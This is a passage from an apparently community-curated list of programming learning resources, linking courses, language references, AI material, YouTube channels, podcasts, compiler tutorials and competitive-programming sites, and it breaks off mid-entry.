Online Courses, Advance Your Career, Improve Your Life. - [Kadenze/Creative Programming](https://www.kadenze.com/courses?subjects%5B%5D=7) : Programming courses focused on art and creativity - [MIT OCW Electrical Engineering and Computer Science](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/) - [MOOC.fi](http://mooc.fi/english.html) : Free online courses from the University of Helsinki - [NPTEL](http://nptel.ac.in) : Free online courses by IIT with certificates - [prakhar1989/awesome-CS-courses](https://github.com/prakhar1989/awesome-courses/blob/master/README.md) : List containing large amount of CS courses - [Pluralsight](https://www.pluralsight.com) : An online learning and workforce development platform that helps businesses and individuals adjust to changing technology. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Sites related to your preferred programming language (For me C++) - [Best books for learning java must read](https://javahungry.blogspot.com/2014/02/best-books-for-learning-java-must-read.html) : Get basics of Java - [Bjarne Stroustrup's C++ Style and Technique FAQ](http://www.stroustrup.com/bs_faq2.html) : The C++ FAQ - [Bjarne Stroustrup's FAQ](http://www.stroustrup.com/bs_faq.html) : The C++ FAQ - [C++11 - the new ISO C++ standard](http://www.stroustrup.com/C++11FAQ.html) : The C++11 FAQ - [Compilers (video)](https://www.youtube.com/playlist?list=PLO9y7hOkmmSGTy5z6HZ-W4k2y8WXF7Bff) : A set of videos on how the GC works - [Deep Dive Java](https://www.infoq.com/presentations/garbage-collection-benefits) : Garbage Collection is Good! - [Free Online Chapters of Inside the Java Virtual Machine by Bill Venners](http://www.artima.com/insidejvm/ed2/index.html) : Java Corner - [How Garbage Collection Works](https://www.dynatrace.com/resources/ebooks/javabook/how-garbage-collection-works/) : Java memory management - [Implementation of Algorithms and Data Structures, Interview Questions and Answers](https://github.com/sherxon/AlgoDS) - [IntelliJ Keyboard Shortcuts](https://www.jetbrains.com/help/idea/keyboard-shortcuts-you-cannot-miss.html) : Keyboard shortcuts to enhance your productivity when working in IntelliJ. - [Java Corner at Artima.com](http://www.artima.com/java/index.html) : Java Corner at Artima.com - [Java Lecture Notes](http://www.cafeaulait.org/course/) : Java Student's Resource - [Java Off Heap](http://www.javaoffheap.com) : Java Off the Heap house - [Java Revisited](http://javarevisited.blogspot.com) : good for learning about Java Language and interview preparation. - [Java-source](http://www.java-source.net) : Java source - [Java Visualizer](http://www.cs.princeton.edu/~cos126/java_visualize/) : helps visualize references, values of variables, etc - [JournalDev - Java, Java EE, Android, Web Development Tutorials](https://www.journaldev.com) : Java, Java EE, Android, Web Development Tutorials - [Learning Java](http://chimera.labs.oreilly.com/books/1234000001805/index.html) : a free online textbook for learning Java - [Netbeans Keyboard Shortcuts](https://netbeans.org/project_downloads/usersguide/shortcuts-80.pdf) : Keyboard shortcuts to enhance your productivity when working in Netbeans. - [Official Qt Documentation](https://doc.qt.io/) : Documentation for different Qt versions, languages, tools and platforms - [Search Open Source Java API](http://www.docjar.com) : view source of java library and learn how things are implemented. - [The C++ Programming Language](http://www.stroustrup.com/C++.html) : The C++ Programming Language. - [The Java Memory Model](http://www.cs.umd.edu/~pugh/java/memoryModel/): The Java Memory Model - [The Java™ Tutorials](https://docs.oracle.com/javase/tutorial/) : The best tutorials for Java. - [Understanding JVM Internals](http://www.cubrid.org/blog/understanding-jvm-internals) : Understanding JVM Internals - [what-is-garbage-collection](https://plumbr.eu/handbook/what-is-garbage-collection) : Demystify the garbage collection - [JavaWorld](https://www.javaworld.com) : Welcome to Javaworld - [XyzWs Java FAQs](http://www.xyzws.com/javafaq/page/1) : large collection of java interview questions - [JavatPoint](https://www.javatpoint.com/java-tutorial) : Best website to get a basic Java programming tutorial - [The Rust Programming Language Book](https://doc.rust-lang.org/book/title-page.html) : Explains the Rust programming language - [Rust Cookbook](https://rust-lang-nursery.github.io/rust-cookbook/intro.html#cookin-with-rust) : Quickly get an overview of the capabilities of the Rust crate ecosystem - [Getting start with python](https://riptutorial.com/ebook/python) : A-Z python programming concepts and methods. - [Rust by Example](https://doc.rust-lang.org/rust-by-example/) : A collection of runnable examples that illustrate various Rust concepts and standard libraries <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Learn AI - [aima](http://aima.cs.berkeley.edu) : The leading textbook in Artificial Intelligence (4th most cited publication of the century). Includes Github repositories and more AI resources! - [fast.ai](http://course.fast.ai) : Free practical *deep learning* course for coders without grad-level maths! - [TypeDB](https://vaticle.com) : A Strongly-typed Database - [Robots that learn](https://blog.openai.com/robots-that-learn/) : Robots that Learn - [Unsupervised Sentiment Neuron](https://blog.openai.com/unsupervised-sentiment-neuron/) : Unsupervised Sentiment Neuron - [What's the difference between AI- DP and ML?](https://blogs.nvidia.com/blog/2016/07/29/whats-difference-artificial-intelligence-machine-learning-deep-learning-ai/) : Difference artificial intelligence, machine-learning, deep-learning-ai - [TensorFlow](https://www.tensorflow.org) : An open-source software library for Machine Intelligence - [Scikit-learn](http://scikit-learn.org) : A Python module for machine learning build on top of SciPy - [DeepLearning.ai](https://www.deeplearning.ai) : Deep Learning course by Andrew Ng, Founder of Coursera - [Coding the History of Deep Learning](http://blog.floydhub.com/coding-the-history-of-deep-learning/) : Coding the History of Deep Learning - [Serpent AI](https://github.com/SerpentAI/SerpentAI) : Game Agent Framework. Helping you create AIs / Bots to play any game you own! BETA - [Blog Floydhub](https://blog.floydhub.com/colorizing-b&w-photos-with-neural-networks/) : Colorizing B&W Photos with Neural Networks - [MLCOURSE.AI](https://mlcourse.ai/) : Open Machine Learning course by OpenDataScience - [Elements of AI](https://course.elementsofai.com/) : A free course for AI basics by Reaktor and University of Helsinki - [Machine Learning Mastery](https://machinelearningmastery.com/) : A comprehensive blog that contains guidance, tutorials, and e-book for mastering ML - [Machine Learning Crash Course](https://developers.google.com/machine-learning/crash-course) : A jumpstart AI course from Google - [Machine Learning Tutorial: A Step-by-Step Guide for Beginners](https://www.simplilearn.com/tutorials/machine-learning-tutorial) : A one-stop playlist for all the basics of Machine Learning simplified, from Logistic Regression to Reinforcement Learning. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Seminar, research writing, talks, etc - [Advice on Research and Writing](http://www.cs.cmu.edu/~mleone/how-to.html) : A collection of advice about how to do research and how to communicate effectively (primarily for computer scientists). - [PHD MS Articles](http://www.cse.iitd.ac.in/~srsarangi/articles.html) : articles and views - [Seminar and reports](https://www.cse.iitb.ac.in/~ranade/communicationskills.html) : Everyone must read this tiny book before writing the seminar report - [Latex reference](http://latex.knobs-dials.com) : Arbitrary reference - [Begin Latex in minutes](https://github.com/LewisVo/Begin-Latex-in-minutes) : Brief Intro to LaTeX for beginners that helps you use LaTeX with the ease - [Lshort](https://tobi.oetiker.ch/lshort/lshort.pdf) : The Not So Short Introduction to LATEX2ε <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Everything in one place - [API Documentation](http://devdocs.io) : A one-place well-known API Documentation with a searchable interface - [Baeldung](https://www.baeldung.com) : Step-by-step guides for Spring, rest, Java, security, persistence, Jackson, HTTP client-side and Kotlin - [Branition Colors](https://branition.com/colors) : Collection of hand-curated color palettes best fitted for branding. - [cheat.sh](https://github.com/chubin/cheat.sh) : `curl cheat.sh` — the only cheat sheet you need — instant answers on programming questions with `curl` - [Developer Roadmaps](https://roadmap.sh/) : Step by step guides and paths to learn different tools or technologies - [DevURLs](https://devurls.com/) : Developer news aggregator - [Kaggle](https://www.kaggle.com/) : All-in-one Machine Learning and Data Science Community – access free GPUs and a huge repository of community published data & code. - [MDN Web Docs](https://developer.mozilla.org/en-US/) : A place with all the documentation of the web standards - [Rico's cheatsheets](https://devhints.io) : A set of good cheatsheets - [Programming Subreddits](https://www.reddit.com/user/ashish2199/m/cs_student_subs/) : a multisubreddit of all subreddits of topics related to computer science and programming. - [Websites a programmer should visit](https://www.quora.com/What-are-the-best-websites-a-programmer-should-visit/answer/Ashish-Padalkar?srid=OH96) : Response on Quora by ashish2199 - [gitignore](https://www.gitignore.io/) : A collection of useful .gitignore templates for your project. Select from 442 Operating System, IDE, and Programming Language - [Hidden Tools](https://hiddentools.dev/) : Discover a wide collection of tools made by the community - for you. ✨ - [Coolors](https://coolors.co/) : Create the perfect palette or get inspired by thousands of beautiful color schemes. - [Tailwind CSS Page Builder](https://devdojo.com/tails/app) : The perfect Tailwind CSS Page Builder - [LottieFiles](https://lottiefiles.com/) : The world’s largest online platform for the world’s smallest animation format for designers, developers, and more. Access Lottie animation tools and plugins for Android, iOS, and Web. - [UI Design Daily](https://www.uidesigndaily.com/) :Weekly FREE UI resources straight to your inbox - [Iconscout](https://iconscout.com/) : Over 2.2 Million+ Design Assets, Curated SVGs, Vector Icons, Illustrations, 3D graphics, and Lottie Animations. Over 3000+ assets added every day. Integrated plugins, tools, editors, and more. - [Json API App](https://www.jsonapi.co/) : Single repository for everything you need to build better products as a developer. API, DB, Queue, Server, Webhooks, Bin, Tools, Podcasts etc. Everything you need to build super apps that our world needs. - [Library or micro code solutions](https://onelinerhub.com/) : Community library of micro code pieces for popular issues. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## YouTube Channels - [C++Now (BoostCon)](https://www.youtube.com/channel/UC5e__RG9K3cHrPotPABnrwg) : C++Now (previously BoostCon) conference - [code::dive conference](https://www.youtube.com/channel/UCU0Rt8VHO5-YNQXwIjkf-1g) : code::dive conference organized by NOKIA Wrocław Technology Center - [Coding Blocks](https://www.youtube.com/user/codingblocks) : Tutorials, how to's, tips and tricks - [Computerphile](https://www.youtube.com/user/Computerphile/videos) : Must watch for every CS student - [ComputerHistory](https://www.youtube.com/user/ComputerHistory/videos) : for those who like to know how we reached where we are. - [CppCon](https://www.youtube.com/user/CppCon/videos?shelf_id=0&view=0&sort=dd) : C++ Conference - [Facebook Developers](https://www.youtube.com/user/FacebookDevelopers/videos) - [Google Developers](https://www.youtube.com/user/GoogleDevelopers/videos) - [GoogleTechTalks](https://www.youtube.com/user/GoogleTechTalks/videos) : videos on trending topics and cool stuff happening in the tech industry. - [Gynvael Coldwin](https://www.youtube.com/user/GynvaelEN) : Awesome reverse engineering and hacking(CTF) videocasts. Every Wednesday is new live streams. - [HowToBecomeTV](https://www.youtube.com/user/HowToBecomeTV/videos) : contains good interviews of developers and people related to the tech industry. - [Java](https://www.youtube.com/user/java/videos) : talks related to java - [JavaOne](https://www.youtube.com/channel/UCdDhYMT2USoLdh4SZIsu_1g/videos) : Java Conference - [javidx9](https://www.youtube.com/channel/UC-yuWVUplUJZvieEligKBkA/videos) : Game and graphics tutorials - [Meeting C++ YT Kanalseite](https://www.youtube.com/user/MeetingCPP/videos) : Talks on C++ - [MIT OpenCourseWare](https://www.youtube.com/user/MIT/) : MIT OpenCourseWare for learning in-depth algorithms, data structures, and computer engineering - [Murtaza's OpenCV Robotics and AI](https://www.youtube.com/c/MurtazasWorkshopRoboticsandAI/): OpenCV, Self Driving, Robotics and AI tutorials. - [Netflix UI Engineering](https://www.youtube.com/channel/UCGGRRqAjPm6sL3-WGBDnKJA/videos) : great videos to watch for web developers, mobile developers and those interested in some of Netflix's tech stack - [O'Reilly](https://www.youtube.com/user/OreillyMedia/videos) : interviews and talks of the world's best technical writers. - [Placement Grid](https://www.youtube.com/user/PlacementGrid/videos) : Interview and campus placement experience - [Scott Meyers: Past Talks](http://www.aristeia.com/presentations.html) - [Siraj Raval](https://www.youtube.com/channel/UCWN3xxRkmTPmbKwht9FuE5A) : Artificial Intelligence and deep learning tutorials videos - [ThinMatrix](https://www.youtube.com/user/ThinMatrix/videos) : blogs and tutorials developer making a 3d game in Java using OpenGL - [thoughtbot](https://www.youtube.com/user/ThoughtbotVideo/videos) : talks on various topics - [Traversy Media](https://www.youtube.com/user/TechGuyWeb/videos) :Web development and programming - [yegor256](https://www.youtube.com/user/technoparkcorp/videos) - [GOTO Conference](https://www.youtube.com/user/GotoConferences) : tech talks from the GOTO Conference by Developers for Developers - [freeCodeCamp](https://www.youtube.com/channel/UC8butISFwT-Wl7EV0hUK0BQ) : freecodecamp youtube channel - [Bo Qian](https://www.youtube.com/channel/UCEOGtxYTB6vo6MQ-WQ9W_nQ) : Learn advanced c++ - [Geeksforgeeks](https://www.youtube.com/channel/UC0RhatS1pyxInC00YKjjBqQ/videos) : geeksforgeeks youtube - [Hacker earth](https://www.youtube.com/channel/UCYU6nvKyRYnE5kiG9JXkXpA) : Hacker earth youtube - [Hak5](https://www.youtube.com/user/Hak5Darren) : Put together by a band of IT ninjas, security professionals, and hardcore gamers, Hak5 isn't your typical tech show. We take on hacking in the old-school sense. - [Khan Academy](https://www.youtube.com/channel/UC4a-Gbdw7vOaccHmFo40b9g) : Khan Academy youtube - [LearnCode.academy](https://www.youtube.com/channel/UCVTlvUkGslCV_h-nSAId8Sw) : 100% FREE Web Development tutorials, web site design tutorials, and more. Including, but not limited to: HTML, CSS, JavaScript, CSS Layouts, Responsive Design, React.js, Node.js, Angular.js, Docker, Dev - [Rachit Jain](https://www.youtube.com/channel/UC9fDC_eBh9e_bogw87DbGKQ/featured) : competitive programming - [sentdex](https://www.youtube.com/channel/UCfzlCWGWYyIQ0aLC5w48gBQ) : Python Programming tutorials, going further than just the basics. Learn about machine learning, finance, data analysis, robotics, web development, game development, and more. - [Steve Griffith](https://www.youtube.com/channel/UCTBGXCJHORQjivtgtMsmkAQ) : The videos on this channel are largely about web design & development with a good dose of mobile development thrown in just for fun. - [The Coding Train](https://www.youtube.com/channel/UCvjgXvBlbQiydffZU7m1_aw) : In this YouTube channel I publish "creative coding" video tutorials every week. Subjects covered range from the basics of programming languages like JavaScript (with p5.js) and Java (with Processing) to generative algorithms like physics simulation, computer vision, and data visualization. - [TheHappieCat](https://www.youtube.com/channel/UCBsuOBu-dxj5bx1KMgmar5g) : Videos on technology, storytelling, and being happie. - [Tutorials Point (India) Pvt. Ltd.](https://www.youtube.com/channel/UCVLbzhxVTiTLiVKeGV7WEBg) : Tutorials Point originated from the idea that there exists a class of readers who respond better to online content and prefer to learn new skills at their own pace from the comforts of their drawing rooms. We bring simple to understand Text and Video tutorials at zero cost and cover many subjects including IT, Engineering, MBA, MCA, Management, Various Exams Preparation, and Academic subjects. If you are not extravagant and willing to save your money and time then we recommend you to try our tutorials.experience - [Udacity](https://www.youtube.com/channel/UCBVCi5JbYmfG3q5MEuoWdOw) : Udacity, a pioneer in online education, is building "University by Silicon Valley", a new type of online university - [V. Anton Spraul](https://www.youtube.com/channel/UCLEMTlEe5RE04EoULMHWEEQ) : Videos for people who want to understand the software better, including explanations of how the software performs some of its most important jobs and tools programmers can use to solve programming problems. - [xdadevelopers](https://www.youtube.com/channel/UCk1SpWNzOs4MYmr0uICEntg) : You have found the world-famous XDA-Developers.com YouTube Channel, known as XDA TV. We cover Android and Windows Mobile from HTC, Samsung, Motorola, Sony, and more. Learn about rooting your Android, how to build applications, and more. - [KudVenkat](https://www.youtube.com/user/kudvenkat/) : Microsoft .NET technologies and SQL Server tutorials. - [The Net Ninja](https://www.youtube.com/channel/UCW5YeuERMmlnqo4oq8vwUpg): Web development tutorials - [Web Dev Simplified](https://www.youtube.com/channel/UCFbNIlppjAuEX4znoulh0Cw): Tutorials based on Web development from basic to advanced. - [Take You Forward](https://www.youtube.com/c/takeUforward): Tutorials on Data structures and Algorithms in Java and C++. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Good Articles - [14 Things I Wish I’d Known When Starting with MongoDB](https://www.infoq.com/articles/Starting-With-MongoDB/) - [40 Keys Computer Science Concepts Explained In Layman’s Terms](http://carlcheo.com/compsci) - [A Gentle Introduction To Graph Theory](https://dev.to/vaidehijoshi/a-gentle-introduction-to-graph-theory) - [A programmer-friendly language that compiles to Lua.](http://moonscript.org) - [A Software Developer’s Reading List](https://stevewedig.com/2014/02/03/software-developers-reading-list/) : Some good books and links in there. - [Code a TCP/IP stack](http://www.saminiir.com/lets-code-tcp-ip-stack-5-tcp-retransmission/) : Let's code a TCP/IP stack, 5: TCP Retransmission - [Codewords.recurse](https://codewords.recurse.com/issues/four/the-language-of-choice) : The language of choice - [Data structure and Algorithms](https://techiedelight.quora.com/500-Data-Structures-and-Algorithms-practice-problems-and-their-solutions) : List of some algorithms and data structures with their solutions. - [Dive into the byte code](https://www.wikiwand.com/en/Java_bytecode) - [Expectations of a Junior Developer](http://blog.thefirehoseproject.com/posts/expectations-of-a-junior-developer/) - [Getting Started with MongoDB – An Introduction](https://studio3t.com/knowledge-base/articles/mongodb-getting-started/) - [Linux Inside](https://0xax.gitbooks.io/linux-insides/content/Booting/linux-bootstrap-1.html) - [List of algorithms](https://www.wikiwand.com/en/List_of_algorithms) - [Step by Step Guide to Database Normalization](https://www.databasestar.com/normalization-in-dbms/): A guide to database normalization. - [The Key To Accelerating Your Coding Skills](http://blog.thefirehoseproject.com/posts/learn-to-code-and-be-self-reliant/) - [Unicode](https://www.joelonsoftware.com/2003/10/08/the-absolute-minimum-every-software-developer-absolutely-positively-must-know-about-unicode-and-character-sets-no-excuses/) - [We are reinventing the retail industry through innovative technology](http://multithreaded.stitchfix.com) - [What every programmer absolutely, positively needs to know about encodings and character sets to work with text](http://kunststube.net/encoding/) - [What every programmer should know about memory - PDF](http://futuretech.blinkenlights.nl/misc/cpumemory.pdf) - [qotoqot - improving-focus](https://qotoqot.com/blog/improving-focus/) : How I got to 200 productive hours a month - [Pixel Beat - Unix](http://www.pixelbeat.org/docs/unix-parallel-tools.html) : Parallel processing with Unix tools - [Learning Vim](https://hackernoon.com/learning-vim-what-i-wish-i-knew-b5dca186bef7) : What I Wish I Knew - [Write a Kernel](http://arjunsreedharan.org/post/82710718100/kernel-101-lets-write-a-kernel) : Kernel 101 – Let’s write a Kernel - [Learning JavaScript Design Patterns](https://addyosmani.com/resources/essentialjsdesignpatterns/book/) : the online version of the Learning JavaScript Design Patterns published by O'Reilly, released by the author Addy Osmani under CC BY-NC-ND 3.0 - [Working with Webhooks](https://requestbin.com/blog/working-with-webhooks/) : a comprehensive guide on webhooks - [How I got TensorFlow Developer Certified](https://www.mrdbourke.com/how-i-got-tensorflow-developer-certified/) : Step By Step guide to pass Tensorflow Developer Certification <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Podcasts - [Coding Blocks](http://www.codingblocks.net) : A podcast covering topics such as best programming practices, design patterns, coding for performance, object-oriented coding, database design and implementation, tips, tricks and a whole lot of other things. - [Developer On Fire](http://developeronfire.com/episodes) : A podcast that shares the humanity of developers and tells stories of some of the amazing people in software, hosted by Dave Rael. - [Developer Tea](https://spec.fm/podcasts/developer-tea) : A podcast for developers designed to fit inside your tea break. - [Front End Happy Hour](http://frontendhappyhour.com) : A podcast featuring a panel of Software Engineers from Netflix, Evernote, Atlassian & LinkedIn talking over drinks about all things Front End development. - [Full Stack Radio](http://www.fullstackradio.com) : Everything from product design and user experience to unit testing and system administration. - [Groovy Podcast](http://groovypodcast.podbean.com) : A podcast dedicated to the Groovy programming language and its ecosystem. - [IPhreaks](https://devchat.tv/iphreaks) : A weekly group discussion about iOS development and related technology by development veterans. We discuss Apple, tools, practices, and code. - [JavaScript Jabber](https://devchat.tv/js-jabber) : A weekly discussion about JavaScript, front-end development, community, careers, and frameworks. - [Learn To Code With Me Podcast](https://learntocodewith.me/podcast/) : A Season by season of tech podcast episodes by Laurence Bradford with topics ranging from Career in Tech to lessons in doing tech business - [LispCast](https://lispcast.com/category/podcast/) : A podcast by Eric Normand, a functional programming expert talking about FP concepts. - [MS Dev Show](http://msdevshow.com) : Jason Young and Carl Schweitzer talk about the latest in developer news covering topics such as the Azure cloud, Windows, Windows Phone, Visual Studio, and cross-platform development using the Microsoft platform. - [React Native Radio](https://devchat.tv/react-native-radio) : A weekly discussion of the tools, techniques, and technologies used to build mobile applications with JavaScript and React. - [ShopTalk Show](https://shoptalkshow.com/) : A weekly podcast about just building websites from Dave Rupert and Chris Coyier. - [Soft Skills Engineering](https://softskills.audio/) : A weekly advice podcast for software developers about non-technical topics. - [Software Engineering Daily](https://softwareengineeringdaily.com) : A daily technical interview about software topics. - [Software Engineering Radio](http://www.se-radio.net) : A podcast targeted at the professional software developer. The goal is to be a lasting educational resource, not a newscast. - [Syntax](https://syntax.fm) : A Tasty Treats Podcast for Web Developers by Wes Bos & Scott Tolinski. - [The Bike Shed](http://bikeshed.fm) : Guests discuss their development experience and challenges with Ruby, Rails, JavaScript, and others. - [The Changelog](https://changelog.com/podcast) : A weekly conversation that gets to the heart of open source technologies and the people who create them. - [The Cynical Developer](https://cynicaldeveloper.com) : A podcast that aims to help you to improve your development knowledge and career, through explaining the latest and greatest in development technology and providing you with what you need to succeed as a developer. Covering Desktop, web, and mobile development, mainly around the .Net Stack but often looking into other software and frameworks. - [The Real Python Podcast](https://realpython.com/podcasts/rpp/) : A weekly Python podcast hosted by Christopher Bailey with interviews, coding tips, and conversation with guests from the Python community. - [Blockchain Insider by 11:FS](blockchain.global/blockchain-innovation) : Podcast to learn about the Blockchain Technology - [Unchained](unchainedpodcast.co) Podcast to learn about the Blockchain Technology - [Talk python to me](https://talkpython.fm/) Podcast to learn about Python through interviews and discussions - [Python bytes](https://pythonbytes.fm) Podcast to learn about the latest happenings and trends in Python <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Building a Simple Compiler/Interpreter - [:snowman: Possibly the smallest compiler ever](https://github.com/thejameskyle/the-super-tiny-compiler) : This is an ultra-simplified example of all the major pieces of a modern compiler written in easy to read JavaScript. - [Awesome Compilers](http://aalhour.com/awesome-compilers/) : Curated list of awesome resources on Compilers, Interpreters, and Runtimes. - [Growing a compiler](http://www.cs.dartmouth.edu/~mckeeman/cs48/mxcom/gem/html/GrowingCompiler.html) : Learn how to grow a compiler - [Let’s Build A Simple Interpreter. Part 1.](https://ruslanspivak.com/lsbasi-part1/) : Try to demystify compilers by building one - [Resources for Amateur Compiler Writers](http://c9x.me/compile/bib/) : Resources for Amateur Compiler Writers - [Structure and Interpretation of Computer Programs](https://sarabander.github.io/sicp/html/index.xhtml) : Structure and Interpretation of Computer Programs - [Writing My First Compiler](https://dev.to/fcpauldiaz/writing-my-first-compiler) : Write out your first compiler - [An Intro to Compilers](https://nicoleorchard.com/blog/compilers) : How to Speak to Computers, Pre-Siri - [Write your own compiler](http://staff.polito.it/silvano.rivoira/HowToWriteYourOwnCompiler.htm) : How to write your compiler - [Crafting Interpreters](http://craftinginterpreters.com/) A handbook for writing interpreters, first implementing a tree walking interpreter and later a bytecode virtual machine - [Writing a C Compiler](https://norasandler.com/2017/11/29/Write-a-Compiler.html) : The first post in a series by Nora Sandler on writing your own C compiler <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Tutorials - [A Hacker's Guide to Git](https://wildlyinaccurate.com/a-hackers-guide-to-git/) : for those wanting to learn git with a solid foundation - [A Byte of Python](https://python.swaroopch.com) : a free beginner introduction to python - [Best Of - Gustavo Duarte](http://duartes.org/gustavo/blog/best-of/) : contains articles on various topics - [CMSI 281: Data Structures](http://cs.lmu.edu/~ray/classes/dsa/) : lightweight introduction to DS - [Collecting all the cheat sheets](http://overapi.com) : cheat sheets for lots of programming languages - [C Programming](http://users.cs.cf.ac.uk/Dave.Marshall/C/CE.html) - [CryptoHack](https://cryptohack.org/) : Learn cryptography through challenges and tutorials. Has a leaderboard and new challenges are added every few months. - [Programming Community Curated C++ Resources](https://hackr.io/tutorials/learn-c-plus-plus) : resources recommended by developers - [Deep C](https://www.slideshare.net/olvemaudal/deep-c) : very good presentation on C language - [Design Patterns: Elements of Reusable Object-Oriented Software](https://www.amazon.com/Design-Patterns-Elements-Reusable-Object-Oriented/dp/0201633612) : aka the "Gang Of Four" book, or GOF - [Dynamic programming - PrismoSkills](http://prismoskills.appspot.com/lessons/Dynamic_Programming/Chapter_01_-_Introduction.jsp) : very good resource if want to learn how to solve DP problems. - [Flexbox Froggy](https://flexboxfroggy.com) : a game that teaches you how to use CSS flexbox properties - [Git from the inside out](https://maryrosecook.com/blog/post/git-from-the-inside-out) - [Head First Design Patterns](https://www.amazon.com/Head-First-Design-Patterns-Brain-Friendly/dp/0596007124) - [How to Program in C++](http://cs.fit.edu/~mmahoney/cse2050/how2cpp.html) : Good resource for revising C++ topics and STL - [http://www.mysqltutorial.org/](http://www.mysqltutorial.org) - [indradhanush tutotials](https://indradhanush.github.io/blog/writing-a-unix-shell-part-3/) : Writing a Unix Shell - [Introduction to C Programming](http://www.le.ac.uk/users/rjm1/cotter/index.htm) - [Learn UNIX in 10 minutes](http://freeengineer.org/learnUNIXin10minutes.html) - [Learning the shell.](http://linuxcommand.org) - [Linux Journey](https://linuxjourney.com) : good site for learning Linux - [Linux Tutorial](https://ryanstutorials.net/linuxtutorial/) : good resource for learning Linux - [Missing Semester](https://missing.csail.mit.edu/) : The missing semester of your computer science education - [More about Github-flavored markdown](https://guides.github.com/features/mastering-markdown/) - [MySQL Essentials](http://www.techotopia.com/index.php/MySQL_Essentials) - [Open Data Structures](http://opendatastructures.org) : Excellent resource for learning about DS and algos, provides code in various languages C++, Java, and pseudocode. - [OS Course Notes](https://www2.cs.uic.edu/~jbell/CourseNotes/OperatingSystems/) : Chapter-wise course notes according to Galvin's book - [Programming, Web Development, and DevOps news, tutorials, and tools for beginners to experts](https://dzone.com) - [Stanford Programming Course](https://see.stanford.edu/Course/CS106A) : Full, free CS course created by Stanford - [SQL (Structured Query Language) in one page : SQL.SU](http://www.cheat-sheets.org/sites/sql.su/) : a very good SQL cheat sheet - [Subtle/Poor Man's CI](https://www.subtle.press/course/poor-mans-ci) : Learn how continuous integration platforms work under the hood, by building one of your own on top of git with Node.js - [TCP/IP Illustrated Series](https://en.wikipedia.org/wiki/TCP/IP_Illustrated) - [The Bash Guide](http://guide.bash.academy) : a very good guide for learning the Bash Shell - [The Descent to C](https://www.chiark.greenend.org.uk/~sgtatham/cdescent/) : for those moving to C from some higher programming language like java or python. - [The Linux Command Line: A Complete Introduction](https://www.amazon.com/Linux-Command-Line-Complete-Introduction/dp/1593273894) - [The Unix Programming Environment](http://product.half.ebay.com/The-UNIX-Programming-Environment-by-Brian-W-Kernighan-and-Rob-Pike-1983-Other/54385&tg=info) - [TopCoder Tutorials](https://www.topcoder.com/community/data-science/data-science-tutorials/) - [Tutorialspoint](https://www.tutorialspoint.com) : Text and Video Tutorials for UPSC, IAS, PCS, Civil Services, Banking, Aptitude, Questions, Answers, Explanation, Interview, Entrance, Exams, Solutions - [UNIX and Linux System Administration Handbook, 4th Edition](https://www.amazon.com/UNIX-Linux-System-Administration-Handbook/dp/0131480057) - [VimTutor+](https://vimtutorplus.herokuapp.com/exercise/1) : Learn VIM from the browser. - [W3Schools Online Web Tutorials](https://www.w3schools.com) - [Unix Shell](https://www.dartmouth.edu/~rc/classes/ksh/print_pages.shtml) : Unix shell scripting with ksh/bash - [Snap SVG](http://snapsvg.io) : The JavaScript SVG library for the modern web - [vim.rtorr](https://vim.rtorr.com) : Vim Cheat Sheet - [Open Vim](http://www.openvim.com/tutorial.html) : Interactive Vim tutorials - [Algorithm Using Dynamic Programming and A](http://thume.ca/2017/06/17/tree-diffing/) : Designing a Tree Diff Algorithm Using Dynamic Programming and A* - [Learn Python](https://www.learnpython.org) : Free Interactive Python Tutorial - [C++17](https://www.viva64.com/en/b/0533/) : A guide of C++17 - [The Bash Academy](http://www.bash.academy) : The Bash Academy is an initiative to promote the bash shell language and educate people on its use. - [Learn Shell Programming](http://learnshell.org) : This website is intended for everyone who wishes to learn programming with Unix/Linux shell interpreters. - [Java tutorial](https://hackr.io/tutorials/learn-java) : A programming community & a great place to find the best online programming courses and tutorials. - [Explain Shell](https://explainshell.com/): Match command-line arguments to their help text - [Speaking io](https://speaking.io/) : Tips for public speaking - [Javascript.info](https://javascript.info/) : The Modern JavaScript Tutorial <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Watch others code - [Education Ecosystem](https://www.education-ecosystem.com) : screencast of people building applications, websites, games, etc. - [Twitch.tv](https://www.twitch.tv/directory/game/Science%20%26%20Technology) : The programming community of twitch. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## What should a programmer know - [Can I use](https://caniuse.com/) : A website that provides up-to-date browser support tables for support of front-end web technologies on desktop and mobile web browsers. - [GitHub.com Build software better, together](https://github.com) : Place to showcase your project and collaborate with others. (Must know Git to use it effectively) - [GitLab](https://about.gitlab.com) : An alternative to GitHub that offers free unlimited (private) repositories and unlimited collaborators. - [Programmer Competency Matrix](http://sijinjoseph.com/programmer-competency-matrix/) : article for knowing what our level as a programmer is. <div align="right"> <b><a href="#index">↥ Back To Top</a></b> </div> ## Competitive programming - [Topic Wise Problem For Competitive Programmer](https://a2oj.com/categories) : Topic wise Practise Problem - [Advent of Code](https://adventofcode.com) : An Advent calendar of small programming puzzles - [Archived Problems - Project Euler](https://projecteuler.net/archives) : Problems Archives - [Art of Problem Solving](https://artofproblemsolving.com) : Is math class too easy for you? You've come to the right place! - [CodeChef](https://www.codechef.com) : The only programming contests Web 2.0 platform - [CodeSignal](https://app.codesignal.com) : Test your coding skills - [CodeEval](https://www.codeeval.dev/) : Notepad for notes and code snippets, stored locally in the browser - [Codeforces](http://codeforces.com) : Programming Competition,Programming Contest,Online Computer Programming - [Codewars](https://www.codewars.com) : Rank up by completing code kata - [Codility](https://codility.com) : Verify and improve coding skills - [Codingame](https://www.codingame.com/start) : Learn coding through games and challenges! - [Facebook Hacker Cup](https://www.facebook.com/hackercup/) : Facebook's Programming Contest, past problems solutions and FAQ - [Google Code Jam Practice and](https://code.google.com/codejam/past-contests) : past contest problems for practice - [HackerEarth - Programming challenges and Developer jobs](https://www.hackerearth.com) - [HackerRank](https://www.hackerrank.com) : Practice coding. Compete. Find jobs. - [LightOJ](https://lightoj.com) : Practicing at lightoj is so good for beginners as it is categorized and have also chat room and forum which helps to communicate with others about any problem. - [PKU ACM 